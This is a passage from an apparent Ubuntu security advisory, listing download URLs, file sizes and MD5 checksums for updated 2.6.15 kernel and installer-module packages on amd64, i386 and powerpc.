    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-amd64-generic_2.6.15-27.50_amd64.deb
      Size/MD5:   864826 54e98eb67cb199e9046e50dc710278d3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-amd64-k8_2.6.15-27.50_amd64.deb
      Size/MD5:   866254 fe69e288e4c8ff21e2c3925e4522cd84
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-amd64-server_2.6.15-27.50_amd64.deb
      Size/MD5:   865030 002eeae63687f45ffd11dcd3f34c3888
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-amd64-xeon_2.6.15-27.50_amd64.deb
      Size/MD5:   865438 669e65aa841d8f313c208f8935179bf2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27_2.6.15-27.50_amd64.deb
      Size/MD5:  6913802 b2855877c3575445b2c7ee22f184bf97
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-amd64-generic_2.6.15-27.50_amd64.deb
      Size/MD5: 20800358 c98ed2fa0b623ed58220be9c82e405a7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-amd64-k8_2.6.15-27.50_amd64.deb
      Size/MD5: 20773872 a2ad2de8c27f55488854c655ee976d84
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-amd64-server_2.6.15-27.50_amd64.deb
      Size/MD5: 21616544 493754b9dfcff31960c88b77e3d083ff
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-amd64-xeon_2.6.15-27.50_amd64.deb
      Size/MD5: 19883316 b1f41da64ec33729040197d2e85b904b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    15630 5afe9a33be3a8bce8ecf303325cacb49
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:   240272 3d0692cae7c6458ee1e6348bb234566d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:   202554 5d340d6b0b901e722e3320203d0d4639
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:  1048602 732519ed2e13b5cf8d9ee9ba89568293
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:  1486544 44ff377056e6051e7d331ddedf0f4740
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:   161640 30fbb6b1e4a081a0c9373262a47d253f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:     9834 fe87d913cef4e342c97819896072845a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    80856 79ec0d5f69efa6a8fa9feff56ce3ab89
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    49170 de1bfe8a231051f2a6c554b5b03d871e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    35158 2927d2931dd2ce9a1add8f94f00e5d15
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    70864 44461b5376d2f413d0ccb42d8b58fa5d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:     6218 ded9e538af21041d8beb4b2c2325adf6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:     9062 50696aa643d0646559689903dd646698
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    57882 acd510db73bddce854796798042d9a41
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:   123328 b622d42a9557c3318c97783c2c70c894
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:   100894 d3634feb25644d3d12b4e1d362349593
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    79198 1c705c87ba6d5a7d2cc7011288da8a26
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:  1594660 90d5a29f12f9863330c9de215d8b66ec
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    72278 ef6fab677ef518811fb4394851731b06
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    12646 cdf433cade001f522e90ee81ff0b35e3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    33736 196a30215cfc97c8f86ccaff97770559
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:   138176 d5d73f5cc912242b8e27433f9857e04d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    38926 4cbf4b32203c8edc7933e6a68e7fa5f6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:   278740 f01dc12bc2c3dc6c3de9c89c798bfcca

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    18966 ed5608f8063680b75a4114be201be842
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    43448 eb15061625c7ca657220974abae0952e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:   105192 0564811468a30691bacf4b8ef7a323a5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:     2284 1213e558c24eb51ca8d854a889a64f7d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    34480 eee8c354ac83fb0ba6e171cfad1f4b87
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    96890 eab9af485fe3fc7de1da8bf560cc9ee0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    37068 e8c5d1d3285c5288fee296570806f9f7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    44070 1a22d8d0b861e72419b841d66fd1d3ed
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:   167746 61195b84e884cde33a337085cfab653a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    33924 a73dc9f475aec52115a04c227da12b2f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:   137848 f9c351d4dd38683b62fcbfa52ab8294e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    46884 d2f76d29041a97f55978103956d87806
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:   132766 1be5188da07599405a178984ca54e9d9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:   273446 f260ce18eece1daa98fae1f97f7b29a9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:   102256 48fec137ec6cbac1da005b85206bfee1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:  1594894 47f4b4ba19c5b5cc997cfc7145e733df
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-386_2.6.15-27.50_i386.deb
      Size/MD5:   853514 123881b9fed8eb5771d047d81399a2b3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-686_2.6.15-27.50_i386.deb
      Size/MD5:   854464 8e649b58198f7ee316111926f962a314
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-k7_2.6.15-27.50_i386.deb
      Size/MD5:   857936 cc5e77d38a4a9ca78bac25438635846c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-server-bigiron_2.6.15-27.50_i386.deb
      Size/MD5:   858762 eb4180b80194d9fd37eed53b02f0725f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-server_2.6.15-27.50_i386.deb
      Size/MD5:   856564 5aa0d1b48a79d614d80790f5366df345
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27_2.6.15-27.50_i386.deb
      Size/MD5:  6906130 089869cbf595de473b87dbb5e8d4a73b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-386_2.6.15-27.50_i386.deb
      Size/MD5: 21702738 8fbb499a10a2fc20dc0c141d876e9a01
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-686_2.6.15-27.50_i386.deb
      Size/MD5: 22501130 b2ad4cb294c08ca640ac33a67967c86a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-k7_2.6.15-27.50_i386.deb
      Size/MD5: 22240466 d4bf005d6a20426d565869f919a47e7a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-server-bigiron_2.6.15-27.50_i386.deb
      Size/MD5: 23599228 d9ff8f0b5e4ccc57321fa6e49dfdc18f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-server_2.6.15-27.50_i386.deb
      Size/MD5: 23159788 5c899c59cf1377b1efc0f746f0c0819a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    15498 c384b39a8351cc1795d16a59d5df15f5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:   238438 5546d8231098aa48c419d40193d4e39b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:   196968 45bd48cd83d5480d97c2555c8919d2cc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:  1048380 a686d106981adc09c36ef38dd7be8dc2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:  1684954 23918a98198901f5d76e370922d7e7f0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:   160806 1e2341a274616140b7439553067a6db2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:     9162 82bd0a6bbc11c56d3f153b28345af1a7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    76482 00cda7063f9a9c391cff47cd72b91d8f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    53254 7af0469ab64af78952f4381371583785
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    33046 8744f9c0f1e84103a7ae79b69e6815c8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    85618 e97388b7996ec9ff1be200cdcceae835
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:     6026 16e5ffe2f725bb08556eff48e9aca3cd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:     8754 61e5566ea1f56e56103d5d8a96ba5882
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    53594 87e89146f07661c0ee79598ed8697db2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:   130772 78d083d0d4d748c5e1bb6a2bfc511c84
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    98406 abae347020e9123c799e7dce2028dc5c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    77120 719d5e7f8059f7708beab4a517548626
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:  1768336 3e25df5b0f94de0b9170c801ce1805dd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    69556 30e1f956e9c7a0ba6548098bcaffa15f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    11758 01b486959d322fcc19a688e7ca22cb54
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    36000 8357fad67a71cd332aea824da5f00f01
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:   132390 e541ce2920c6535f15d0eacaa5534f3a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:    38550 c163f745cca8fa74eae544de735d6e05
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-27-386-di_2.6.15-27.50_i386.udeb
      Size/MD5:   299116 ae1d731164cf08bd714a223ad1f53041

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    23726 273c34e19ddb5a8cfa947f9ba62457e9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    25946 533cd429ab323ab2c566a0dbc2acba7e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    49310 dfce2ce1ffcc89915d47cb2d644399b0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    51520 6ad0298f6f88a14d6ae20b037e4d5c00
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:     2298 d9a89fe81f2fb3877c306c6427858143
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:     2476 6028eae8edbf9a1c7ec1bc3f826b6952
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    40116 6dd4f4170538df3beacc217133c2ef13
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    43690 8d05aa1b83b520bc4fc92c86e4d7d81c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   112438 7c8d90f7f7c1699df11443878e15b557
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   120554 16002bb6309d150bab30a68d7c56fd6f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    40844 39a1b2475d99cce75de7dc971142d820
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    45350 2a0479eb31df200f55beafc089caa134
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    29024 45ec6c460194ec14b797569a7d4c6fd1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    29894 47319448edb4541638e2efd91c2ef49c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   211400 497682ed625166a7ad33a068038384c9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   225202 eb40f1f1d7ee6067f29b319bf1b55341
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    45044 fb7a2654367b5135d43a97f2375851e3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    40212 8454619c57ca7f7207dcfe889f419a4e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:     1930 327b7c24674cb5581fb35d6bfd406972
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:     2196 b7aabd2bd7bd360b1a12066bde2d8715
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    80590 16acbc783146781700415899fba73b7d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    85954 c393beaadb3394be6b0bde848b5c0d13
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   111624 93866a7a75057a55c8526c30eca04503
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   125786 8bc6dc24a7919a5cadfb2a533131e2bf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    53400 81cdd2ed35f24d331337317f1661ef42
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    58476 3ab28125c0a6a24ee2043611728be340
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   147658 d3cf85fea071f15c87db19aefe5b2e1f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   161476 082e9648ed16f0293c7ef5a980f5eda5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   317486 b7af9812c72aaca090bc9f6b1462506d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   287588 6124c7921f13db38b8061c72c996d721
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   115854 5b5e78e5beeeec821d50439eb2ba6b7e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   116522 2a7f9ebb6d29b4cf85375ecda19f6cf8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:  1922628 b6e8bef92a96cfeb84e7200379c5aca3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:  2434740 856423e38d3ba01a8048aa40a0783990
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-powerpc-smp_2.6.15-27.50_powerpc.deb
      Size/MD5:   868418 73f4f0f33d0563aa8374157c6b518b63
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-powerpc64-smp_2.6.15-27.50_powerpc.deb
      Size/MD5:   864416 160c7b728f00dc53d5867b9f3be72b99
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-powerpc_2.6.15-27.50_powerpc.deb
      Size/MD5:   867794 58675c90db07ee7e07e2b1cbb2b08aa9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27_2.6.15-27.50_powerpc.deb
      Size/MD5:  6937688 736f6e48ac4bc67335b4d63a66f3e797
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-powerpc-smp_2.6.15-27.50_powerpc.deb
      Size/MD5: 22765592 4fa7f842862fe5745cc759cf5d053262
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-powerpc64-smp_2.6.15-27.50_powerpc.deb
      Size/MD5: 23653510 560eba298754728c951558c03ea6be50
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-powerpc_2.6.15-27.50_powerpc.deb
      Size/MD5: 22343254 2e9c1d26cb4315d9662acbb94f923757
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    17780 42300cdeeacc155524611e1d24a65f2d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    17378 090201b8323b0d8c03553631485b4d23
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   261150 ac62e2b229020cc6cd7098036ccf0f54
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   282366 575cb281d78c9f123b43692ee64dc56a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   227454 767086fa7e5a958f0f580155a79d2b35
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   248674 77f2377ecbf08f7320d53a8065d138a8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:  1048448 5442d85fa81de4a9e5b64e73ef18c668
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:  1048590 4c3b22ebaabaae638d657100d1174eaa
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:  1673690 013ba3d9cf3d92be9985e4d3d2d49f57
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:  1808870 bb8eb891e683c5101e36b8250e284123
